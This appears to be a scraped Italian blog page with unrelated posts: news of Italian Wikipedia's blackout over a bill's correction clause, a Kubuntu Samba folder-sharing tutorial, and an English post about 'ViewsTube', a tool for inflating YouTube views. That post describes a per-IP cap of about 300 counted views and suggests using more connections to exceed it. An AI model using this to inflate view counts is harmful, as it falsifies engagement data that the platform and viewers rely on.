Come viene spiegato, il temporaneo (o definitivo?) oscuramento del sito dipende dal Disegno di legge – Norme in materia di intercettazioni telefoniche etc., p. 24, lettera a) comma 29, che recita: «Per i siti informatici, ivi compresi i giornali quotidiani e periodici diffusi per via telematica, le dichiarazioni o le rettifiche sono pubblicate, entro quarantotto ore dalla richiesta, con le stesse caratteristiche grafiche, la stessa metodologia di accesso al sito e la stessa visibilità della notizia cui si riferiscono.»
“Tale proposta di riforma legislativa, che il Parlamento italiano sta discutendo in questi giorni – continua il messaggio sulla home page di Wikipedia – prevede, tra le altre cose, anche l’obbligo per tutti i siti web di pubblicare, entro 48 ore dalla richiesta e senza alcun commento, una rettifica su qualsiasi contenuto che il richiedente giudichi lesivo della propria immagine. Purtroppo, la valutazione della “lesività” di detti contenuti non viene rimessa a un Giudice terzo e imparziale, ma unicamente all’opinione del soggetto che si presume danneggiato. Quindi, in base al comma 29, chiunque si sentirà offeso da un contenuto presente su un blog, su una testata giornalistica on-line e, molto probabilmente, anche qui su Wikipedia, potrà arrogarsi il diritto — indipendentemente dalla veridicità delle informazioni ritenute offensive — di chiedere l’introduzione di una “rettifica”, volta a contraddire e smentire detti contenuti, anche a dispetto delle fonti presenti.”

Wikipedia fa appello all’articolo 27 della Dichiarazione Universale dei Diritti dell’Uomo, che recita: «Ogni individuo ha diritto di prendere parte liberamente alla vita culturale della comunità, di godere delle arti e di partecipare al progresso scientifico e ai suoi benefici. Ogni individuo ha diritto alla protezione degli interessi morali e materiali derivanti da ogni produzione scientifica, letteraria e artistica di cui egli sia autore.»
Il sito vede limitare la propria libertà e indipendenza, ritiene inaccettabile l’obbligo di pubblicare tra i contenuti le smentite previste dal comma 29, a prescindere da qualsiasi verifica; è una costrizione che “snatura i principi alla base dell’Enciclopedia libera e ne paralizza la modalità orizzontale di accesso e contributo, ponendo di fatto fine alla sua esistenza come l’abbiamo conosciuta fino a oggi”. E’ chiaro, infatti, che si rischia di smettere di occuparsi di determinati argomenti o personaggi, “per “non avere problemi”.

condividere cartelle in rete con linux


Oggi vi mostro come fare per condividere delle cartelle con gli altri PC che sono collegati nella tua rete locale.
Kubuntu 11.04 Natty Narwhal fornisce un sistema grafico integrato per la gestione delle directory condivise.
Apri il menù K e seleziona "Gestore dei file" per avviare il file manager Dolphin. Clicca con il tasto destro del mouse sulla cartella che vuoi condividere, per esempio "Documenti" e seleziona "Proprietà".
Ora, nella relativa finestra apri il tab "Condivisione": se non hai installato Samba, il software che consente di condividere dati, clicca su "Install Samba".Una volta installato Samba, nel tab "Condivisione" metti un segno di spunta alla voce "Share with Samba" e premi "Ok".

Arrivederci al prossimo articolo
Michele Balzano

venerdì 30 settembre 2011

Increase views to youtube videos

I was conducting a study regarding criterion of counting of views of YouTube videos. So I wrote a small software "ViewsTube" that was supposed to increase infinitely views on YouTube, but mysteriously stops after a few hundred ... as you can see from the accompanying video.



So thinking that the block was due to software or computer that I used, I did several hours of tests and inspections without being in charge. At one point, the doubt ... and if YouTube were blocking the views to a certain threshold? 

The doubt was legitimacy! 

In fact, after several changes of test computers and connections that I made: 


Any YouTube video can have a unique IP address, a finite number of views (I think around 300). 

Basically I am connected to my adsl to maximize views of about 300 after a video that subsequent views will not be counted, imagining the same computer you can connect another ADSL I could to increase the video with another 300 views. 

if this is true, think about it, it's not right! 

If you think my video was watched by a multinational headquarters in which there are 2500 computers in and out all with the same connection, and then with the same IP would increase only the views of 300, 2200, and others who have watched the video ? 


Fig 1 software ViewsTube


















 

The software is available for testing and educational studies. 
See you next Tutorial 
Michael Balzano


Post più popolari